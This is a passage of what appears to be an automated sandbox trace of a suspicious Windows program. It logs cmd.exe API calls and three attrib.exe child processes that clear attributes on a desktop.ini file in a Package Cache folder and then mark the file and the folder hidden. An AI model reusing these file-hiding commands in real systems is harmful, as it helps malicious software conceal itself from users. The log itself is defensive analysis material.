lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.006] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.006] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.006] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.006] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.006] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.038] FindClose (in: hFindFile=0x2b0830 | out: hFindFile=0x2b0830) returned 1 [0203.038] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0203.038] _close (_FileHandle=3) returned 0 [0203.038] GetConsoleTitleW (in: lpConsoleTitle=0x12f648, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.039] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.039] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.039] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.039] FindClose (in: hFindFile=0x2b0830 | out: hFindFile=0x2b0830) returned 1 [0203.039] FindClose (in: hFindFile=0x2b0830 | out: hFindFile=0x2b0830) returned 1 [0203.039] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0203.039] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0203.039] GetConsoleTitleW (in: lpConsoleTitle=0x12f3dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.039] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f264, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f32c | out: lpAttributeList=0x12f264, lpSize=0x12f32c) returned 1 [0203.039] UpdateProcThreadAttribute (in: lpAttributeList=0x12f264, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f324, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f264, lpPreviousValue=0x0) returned 1 [0203.039] GetStartupInfoW (in: lpStartupInfo=0x12f220 | out: lpStartupInfo=0x12f220*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0203.040] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0203.040] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f2c0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f30c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" ", lpProcessInformation=0x12f30c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xedc, dwThreadId=0xef4)) returned 1 [0203.051] CloseHandle (hObject=0x50) returned 1 [0203.051] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.051] GetEnvironmentStringsW () returned 0x2b2d50* [0203.051] FreeEnvironmentStringsW (penv=0x2b2d50) returned 1 [0203.051] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0203.293] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12f200 | out: lpExitCode=0x12f200*=0x0) returned 1 [0203.293] CloseHandle (hObject=0x4c) returned 1 [0203.293] _vsnwprintf (in: _Buffer=0x12f348, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f20c | out: _Buffer="00000000") returned 8 [0203.293] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0203.293] GetEnvironmentStringsW () returned 0x2b2d50* [0203.293] FreeEnvironmentStringsW (penv=0x2b2d50) returned 1 [0203.293] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0203.293] GetEnvironmentStringsW () returned 0x2b2d50* [0203.293] FreeEnvironmentStringsW (penv=0x2b2d50) returned 1 [0203.293] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f264 | out: lpAttributeList=0x12f264) [0203.293] GetConsoleTitleW (in: lpConsoleTitle=0x12f648, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.294] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.294] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.294] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.294] FindClose (in: hFindFile=0x2b0830 | out: hFindFile=0x2b0830) returned 1 [0203.294] FindClose (in: hFindFile=0x2b0830 | out: hFindFile=0x2b0830) returned 1 [0203.294] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0203.294] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0203.294] GetConsoleTitleW (in: lpConsoleTitle=0x12f3dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.294] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f264, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f32c | out: lpAttributeList=0x12f264, lpSize=0x12f32c) returned 1 [0203.295] UpdateProcThreadAttribute (in: lpAttributeList=0x12f264, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f324, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f264, lpPreviousValue=0x0) returned 1 [0203.295] GetStartupInfoW (in: lpStartupInfo=0x12f220 | out: lpStartupInfo=0x12f220*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0203.295] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0203.295] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f2c0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f30c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"", lpProcessInformation=0x12f30c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x128, dwThreadId=0xe14)) returned 1 [0203.476] CloseHandle (hObject=0x4c) returned 1 [0203.476] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.476] GetEnvironmentStringsW () returned 0x2b3790* [0203.476] FreeEnvironmentStringsW (penv=0x2b3790) returned 1 [0203.476] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0204.446] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f200 | out: lpExitCode=0x12f200*=0x0) returned 1 [0204.446] CloseHandle (hObject=0x50) returned 1 [0204.446] _vsnwprintf (in: _Buffer=0x12f348, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f20c | out: _Buffer="00000000") returned 8 [0204.446] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0204.446] GetEnvironmentStringsW () returned 0x2b3790* [0204.447] FreeEnvironmentStringsW (penv=0x2b3790) returned 1 [0204.447] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0204.447] GetEnvironmentStringsW () returned 0x2b3790* [0204.447] FreeEnvironmentStringsW (penv=0x2b3790) returned 1 [0204.447] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f264 | out: lpAttributeList=0x12f264) [0204.447] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.447] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.448] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.448] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.448] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.448] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.448] SetConsoleInputExeNameW () returned 0x1 [0204.448] GetConsoleOutputCP () returned 0x1b5 [0204.448] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.448] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.449] exit (_Code=0) Process: id = "490" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e60" os_pid = "0xe74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "489" os_parent_pid = "0x8a4" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29984 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29985 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29986 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29987 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 29988 start_va = 0xbb0000 end_va = 0xbb6fff entry_point = 0xbb0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 29989 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29990 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29991 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29992 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 29993 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29994 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29995 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29996 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29997 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 29998 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 29999 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30000 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30001 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30002 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30003 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30004 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30005 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30006 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30007 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30008 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30009 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30010 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30011 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 30012 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30013 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 687 os_tid = 0xeb8 Process: id = "491" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e60" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "489" os_parent_pid = "0x8a4" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30063 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30064 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30065 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30066 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 30067 start_va = 0xf30000 end_va = 0xf36fff entry_point = 0xf30000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30068 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30069 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30070 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30071 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30072 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30073 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30074 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30075 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30076 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 30077 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 30078 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30079 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30080 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30081 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30082 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30083 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30084 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30085 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30086 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30087 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30088 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30089 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30090 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30091 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30092 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 688 os_tid = 0xef4 Process: id = "492" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e60" os_pid = "0x128" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "489" os_parent_pid = "0x8a4" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30119 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30120 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30121 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30122 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 30123 start_va = 0x930000 end_va = 0x936fff entry_point = 0x930000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30124 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30125 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30126 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30127 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 30128 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30129 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30130 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = 